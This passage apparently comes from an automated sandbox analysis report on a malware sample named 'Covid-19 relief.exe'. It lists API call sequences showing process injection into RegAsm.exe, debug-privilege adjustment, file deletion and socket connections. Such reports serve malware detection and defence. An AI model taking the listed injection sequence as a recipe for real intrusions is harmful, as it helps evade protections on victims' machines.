std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$
char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr5_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocato
r@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_str
ing@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE5_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV0
1@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A
            Source: RegAsm.exe, 00000002.00000002.921244963.000000000113A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B01CB mov eax, dword ptr fs:[00000030h]1_2_057B01CB
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD mov ecx, dword ptr fs:[00000030h]1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD mov eax, dword ptr fs:[00000030h]1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057901CB mov eax, dword ptr fs:[00000030h]3_2_057901CB
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057900AD mov ecx, dword ptr fs:[00000030h]3_2_057900AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057900AD mov eax, dword ptr fs:[00000030h]3_2_057900AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Contains functionality to inject code into remote processes
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0040F219
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A88008
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C18008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe2_2_0040A5F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe5_2_0040A5F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00410145
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe'
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Program Manager
